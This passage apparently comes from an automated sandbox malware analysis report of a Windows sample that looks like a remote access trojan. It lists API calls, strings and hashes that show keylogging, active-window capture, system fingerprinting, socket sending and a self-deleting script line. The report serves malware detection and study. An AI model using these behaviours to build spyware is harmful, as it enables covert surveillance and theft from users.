                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                  Control-flow Graph

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1195 40da6f-40da94 call 401f86 1198 40da9a 1195->1198 1199 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1195->1199 1200 40dae0-40dae7 call 41c048 1198->1200 1201 40daa1-40daa6 1198->1201 1202 40db93-40db98 1198->1202 1203 40dad6-40dadb 1198->1203 1204 40dba9 1198->1204 1205 40db9a-40db9f call 43c11f 1198->1205 1206 40daab-40dab9 call 41b645 call 401f13 1198->1206 1207 40dacc-40dad1 1198->1207 1208 40db8c-40db91 1198->1208 1225 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1199->1225 1220 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1220 1221 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1221 1210 40dbae-40dbb3 call 43c11f 1201->1210 1202->1210 1203->1210 1204->1210 1215 40dba4-40dba7 1205->1215 1228 40dabe 1206->1228 1207->1210 1208->1210 1222 40dbb4-40dbb9 call 409092 1210->1222 1215->1204 1215->1222 1233 40dac2-40dac7 call 401f09 1220->1233 1221->1228 1222->1199 1228->1233 1233->1199
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1294 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1305 41b3ad-41b3bc call 4135e1 1294->1305 1306 41b3ee-41b3f7 1294->1306 1310 41b3c1-41b3d8 call 401fab StrToIntA 1305->1310 1308 41b400 1306->1308 1309 41b3f9-41b3fe 1306->1309 1311 41b405-41b410 call 40537d 1308->1311 1309->1311 1316 41b3e6-41b3e9 call 401fd8 1310->1316 1317 41b3da-41b3e3 call 41cffa 1310->1317 1316->1306 1317->1316
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,`m,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$`m
                                                  • API String ID: 782494840-1343863602
                                                  • Opcode ID: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1368 41c482-41c493 1369 41c495-41c498 1368->1369 1370 41c4ab-41c4b2 1368->1370 1371 41c4a1-41c4a9 1369->1371 1372 41c49a-41c49f 1369->1372 1373 41c4b3-41c4cc CreateFileW 1370->1373 1371->1373 1372->1373 1374 41c4d2-41c4d7 1373->1374 1375 41c4ce-41c4d0 1373->1375 1377 41c4f2-41c503 WriteFile 1374->1377 1378 41c4d9-41c4e7 SetFilePointer 1374->1378 1376 41c510-41c515 1375->1376 1380 41c505 1377->1380 1381 41c507-41c50e CloseHandle 1377->1381 1378->1377 1379 41c4e9-41c4f0 CloseHandle 1378->1379 1379->1375 1380->1381 1381->1376
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1382 40a6b0-40a6c0 1383 40a6c6-40a6c8 1382->1383 1384 40a75d-40a760 1382->1384 1385 40a6cb-40a6f1 call 401f04 CreateFileW 1383->1385 1388 40a731 1385->1388 1389 40a6f3-40a701 GetFileSize 1385->1389 1392 40a734-40a738 1388->1392 1390 40a703 1389->1390 1391 40a728-40a72f CloseHandle 1389->1391 1394 40a705-40a70b 1390->1394 1395 40a70d-40a714 1390->1395 1391->1392 1392->1385 1393 40a73a-40a73d 1392->1393 1393->1384 1396 40a73f-40a746 1393->1396 1394->1391 1394->1395 1397 40a716-40a718 call 40b117 1395->1397 1398 40a71d-40a722 Sleep 1395->1398 1396->1384 1399 40a748-40a758 call 409097 call 40a1b4 1396->1399 1397->1398 1398->1391 1399->1384
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137E1
                                                  • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,`m,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                  • String ID: `m
                                                  • API String ID: 1170566393-2103878915
                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                  • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                  APIs
                                                  • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitsend
                                                  • String ID:
                                                  • API String ID: 3963590051-0
                                                  • Opcode ID: 75c5632b30c26a77cc6a251c6ea60dd524e5d6101476a23627ac468793f5a929
                                                  • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                  • Opcode Fuzzy Hash: 75c5632b30c26a77cc6a251c6ea60dd524e5d6101476a23627ac468793f5a929
                                                  • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
